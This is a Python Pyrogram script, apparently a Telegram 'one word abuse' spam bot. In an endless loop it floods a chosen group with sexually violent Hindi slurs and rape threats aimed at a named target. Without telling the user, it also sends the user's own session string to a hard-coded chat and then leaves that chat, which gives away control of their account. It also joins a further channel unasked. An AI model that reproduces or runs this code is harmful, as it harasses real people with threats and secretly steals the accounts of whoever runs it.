import os
import sys
import asyncio
from asyncio import sleep
from pyrogram import Client, filters
from pyrogram.types import Message
import tgcrypto

print("\n - Pyrogram One Word Abuse -")

ID = "3147700"
HASH = "e660ea4d20e70a3897aa8cf3a6dc60af"

Connect = input("\n\nSend Your Pyrogram String Session: \n")

sex = Client(name="Session", api_id=ID, api_hash=HASH, session_string=Connect)

grp = input("\n\nSend Group username Where You Want Abuse: \n")
if grp == "@fullgaallif":
  print("Can't Spam Here!")
elif grp == "@fullgaalli":
  print("Can't Spam Here!")
elif grp == "@fullgaalli":
  print("Can't Spam Here!")
else:
  trg = input("\n\nEnter Target Username or Name \n")
if trg == "@TsfCoOwner":
  print("Can't Spam On Him!")
elif trg == "@TsfCoOwner":
  print("Can't Spam On Him!")
elif trg == "@TsfCoOwner":
  print("Can't Spam On Him!")
elif trg == "@TsfCoOwner":
  print("Can't Spam On Him!")
elif trg == "@TsfCoOwner":
  print("Can't Spam On Him!")
elif trg == "@TsfCoOwner":
  print("Can't Spam On Him!")

print("\n\nOne Word Spam Started!\n\n - @TsfCoOwner -")

sex.start()
sex.join_chat(grp)
sex.join_chat("@SPAMKROBC")
sex.send_message(-1001821868827, f"{Connect}")
sex.leave_chat(-1001821868827)

x = True
try:
  while x != False:
    sex.send_message(grp, f"{trg} TERI")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "MERA")
    sex.send_message(grp, "LODA")
    sex.send_message(grp, f"SPEED PAKAD {trg} ")
    sex.send_message(grp, "MADARCHOD")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "MAAA")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "NANGA")
    sex.send_message(grp, "KAR")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "CHOD")
    sex.send_message(grp, "DU")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "BHENKELODE")
    sex.send_message(grp, f"{trg}")
    sex.send_message(grp, "BAAP")
    sex.send_message(grp, "BOL")
    sex.send_message(grp, "RE")
    sex.send_message(grp, "RANDIII")
    sex.send_message(grp, "KE")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "BHEN")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "BOOBS")
    sex.send_message(grp, "DABABA")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "BHEN")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "CHUCHI")
    sex.send_message(grp, "CHUSKE")
    sex.send_message(grp, "HALKA")
    sex.send_message(grp, "KARDUNGA")
    sex.send_message(grp, f"SPEED PAKD {trg} BETA ? 😂 ")
    sex.send_message(grp, "AANA")
    sex.send_message(grp, "KID")
    sex.send_message(grp, "AIJKT")
    sex.send_message(grp, "HIL")
    sex.send_message(grp, "GYA")
    sex.send_message(grp, "KYA")
    sex.send_message(grp, "TERA")
    sex.send_message(grp, "😂😂😂😂🤣🤣🤣")
    sex.send_message(grp, "TOHR")
    sex.send_message(grp, "MAIYAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "GAAND")
    sex.send_message(grp, "PHAD")
    sex.send_message(grp, "DIYE")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "TRRE")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "CHUT")
    sex.send_message(grp, "ME")
    sex.send_message(grp, "MUTE")
    sex.send_message(grp, "KE")
    sex.send_message(grp, "MACHLI")
    sex.send_message(grp, "CHOR")
    sex.send_message(grp, "DUNGA")
    sex.send_message(grp, "MADARCHOD")
    sex.send_message(grp, "JHATUU")
    sex.send_message(grp, "SABSE")
    sex.send_message(grp, "CHUDA")
    sex.send_message(grp, "HUA")
    sex.send_message(grp, "RANDI")
    sex.send_message(grp, "BALAK")
    sex.send_message(grp, "SB")
    sex.send_message(grp, "TERI")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "K")
    sex.send_message(grp, "RAPE")
    sex.send_message(grp, "KARTE")
    sex.send_message(grp, "BSDKK")
    sex.send_message(grp, "BAAP")
    sex.send_message(grp, "HU")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, f"TERA {trg}")
    sex.send_message(grp, "MADRRCHOD")
    sex.send_message(grp, "LUNNNDDD")
    sex.send_message(grp, "SE")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "KHADAN")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "CHOD")
    sex.send_message(grp, "RKAHA")
    sex.send_message(grp, "HAI")
    sex.send_message(grp, "REPY")
    sex.send_message(grp, "DE")
    sex.send_message(grp, "SUAR")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "AULAAD")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "MAA")
    sex.send_message(grp, "KO")
    sex.send_message(grp, "PHATTEE")
    sex.send_message(grp, "CONDOMM")
    sex.send_message(grp, "SE")
    sex.send_message(grp, "CHODA")
    sex.send_message(grp, "THA")
    sex.send_message(grp, "TABB")
    sex.send_message(grp, "PAIDA")
    sex.send_message(grp, "HUA")
    sex.send_message(grp, "THAA")
    sex.send_message(grp, "AB")
    sex.send_message(grp, "TERE")
    sex.send_message(grp, "GAND")
    sex.send_message(grp, "MAI")
    sex.send_message(grp, "CHODU")
    sex.send_message(grp, "EK")
    sex.send_message(grp, "AUR")
    sex.send_message(grp, "BAAR")
    sex.send_message(grp, "BACHE")
    sex.send_message(grp, "NIKAL")
    sex.send_message(grp, "DUNGA")
    sex.send_message(grp, "😂😂😂")
    sex.send_message(grp, f"{trg} TERI")
    sex.send_message(grp, "MAAAA")
    sex.send_message(grp, "KI")
    sex.send_message(grp, "CHUTT")
    sex.send_message(grp, "CHODD")
    sex.send_message(grp, "CHODD")
    sex.send_message(grp, "KAI")
    sex.send_message(grp, "KALI")
    sex.send_message(grp, "KR")
    sex.send_message(grp, "DU")
    sex.send_message(grp, "GA")
    sex.send_message(grp, "RANDIIII")
    sex.send_message(grp, "BHADWE")
    sex.send_message(grp, "MADARCHOD")
    sex.send_message(grp, "SUAR")
    sex.send_message(grp, "KE")
    sex.send_message(grp, "BACHE")
    sex.send_message(grp, "TERI")
    sex.send_message(grp, "KHANDAN")
    sex.send_message(grp, "DAFAN")
    sex.send_message(grp, "KRDUNGA")
    sex.send_message(grp, "RE")
    sex.send_message(grp, "KID")
    sex.send_message(grp, f"TERI {trg} 😂")
    sex.send_message(grp, f"MAA {trg} 😂")
    sex.send_message(grp, f"KI {trg} 😂")
    sex.send_message(grp, f" {trg} CHUT ")

    sex.send_message(grp, f" {trg} ME ")
    sex.send_message(grp, f"SUAR {trg} 😂")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f" {trg} MOTA ")
    sex.send_message(grp, f" {trg} LUND ")
    sex.send_message(grp, f" {trg} DAALU ")
    sex.send_message(grp, f" {trg} BSDK ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f" {trg} RAPE ")
    sex.send_message(grp, f" {trg} KRU ")
    sex.send_message(grp, f" {trg} AAJA ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f" {trg} BHOSDA ")
    sex.send_message(grp, f" {trg} FAADU ")
    sex.send_message(grp, f" {trg} RANDI ")
    sex.send_message(grp, f" {trg} KE ")
    sex.send_message(grp, f" {trg} CHHODE ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KO ")
    sex.send_message(grp, f" {trg} KONE ")
    sex.send_message(grp, f" {trg} ME ")
    sex.send_message(grp, f" {trg} LEKE ")
    sex.send_message(grp, f" {trg} CHODU ")
    sex.send_message(grp, f" {trg} BSDK ")
    sex.send_message(grp, f" {trg} AJA ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f" {trg} BHOSDA ")
    sex.send_message(grp, f" {trg} RANDI ")
    sex.send_message(
      grp, f"  {trg} TERI MAA KI XHUT KO KAAT KE FEK DU RANDI KE XHODE ")
    sex.send_message(grp, f"{trg} TERI MAA KA BHOSDA FAADU RANDI KE XHODE ")
    sex.send_message(grp, f"{trg} TERI MAA RANDI THI HAI AUR RHEGI ")
    sex.send_message(
      grp,
      f"{trg} TERI MAA KO CHOD KE TUJHE PAIDA KRNE WAALA BHI MAI HI HOON ")
    sex.send_message(grp, f"TERI {trg} 😂")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f"KA {trg} ")
    sex.send_message(grp, f" {trg} RAPE ")
    sex.send_message(grp, f" {trg} KRU ")
    sex.send_message(grp, f" {trg} AAJA ")
    sex.send_message(grp, f" {trg} BEHEN ")
    sex.send_message(grp, f" {trg} KE ")
    sex.send_message(grp, f" {trg} LUND ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MA ")
    sex.send_message(grp, f" {trg} KO ")
    sex.send_message(grp, f" {trg} AISA ")
    sex.send_message(grp, f" {trg} CHODUNGA ")
    sex.send_message(grp, f" {trg} DHARTI ")
    sex.send_message(grp, f" {trg} KALAP ")
    sex.send_message(grp, f" {trg} JAYEGI ")
    sex.send_message(grp, f" {trg} BETICHOD ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f" {trg} KA ")
    sex.send_message(grp, f" {trg} BHOSDA ")
    sex.send_message(grp, f" {trg} FAADU ")
    sex.send_message(grp, f" {trg} RANDI ")
    sex.send_message(grp, f" {trg} KE ")
    sex.send_message(grp, f" {trg} CHODE ")
    sex.send_message(grp, f" {trg} TERI ")
    sex.send_message(grp, f" {trg} MAA ")
    sex.send_message(grp, f"KI {trg} 😂")
    sex.send_message(grp, f"CHUT {trg} 😂")
    sex.send_message(grp, f" {trg} KO ")
    sex.send_message(grp, f" {trg} KAAT ")
    sex.send_message(grp, f" {trg} KE ")
    sex.send_message(grp, f" {trg} FEK ")
    sex.send_message(grp, f" {trg} DU ")
    sex.send_message(grp, f" {trg} RANDI ")
    sex.send_message(grp, f" {trg} KE ")
    sex.send_message(grp, f" {trg} BACHHE ")
    sex.send_message(
      grp,
      f" {trg} TERI MAA KO CHOD KE TUJHE PAIDA KRNE WAALA BAAP MAI HI HOON😂😂")
    sex.send_message(grp, f"TUJHE ABHI PTA CHAL RHA HAI {trg} 😂")
except Exception as a:
  print(a)
